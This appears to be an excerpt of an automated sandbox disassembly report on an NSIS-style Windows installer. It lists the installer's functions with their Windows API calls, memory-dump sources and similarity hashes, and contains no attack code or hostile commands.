                                                                                                                                                                                                                                Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404E77
                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                                • MulDiv.KERNEL32(000982BC,00000064,00099830), ref: 00402FDC
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3449924974-3355392842
                                                                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                                                                • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nslEFEC.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2584051700-0
                                                                                                                                                                                                                                • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

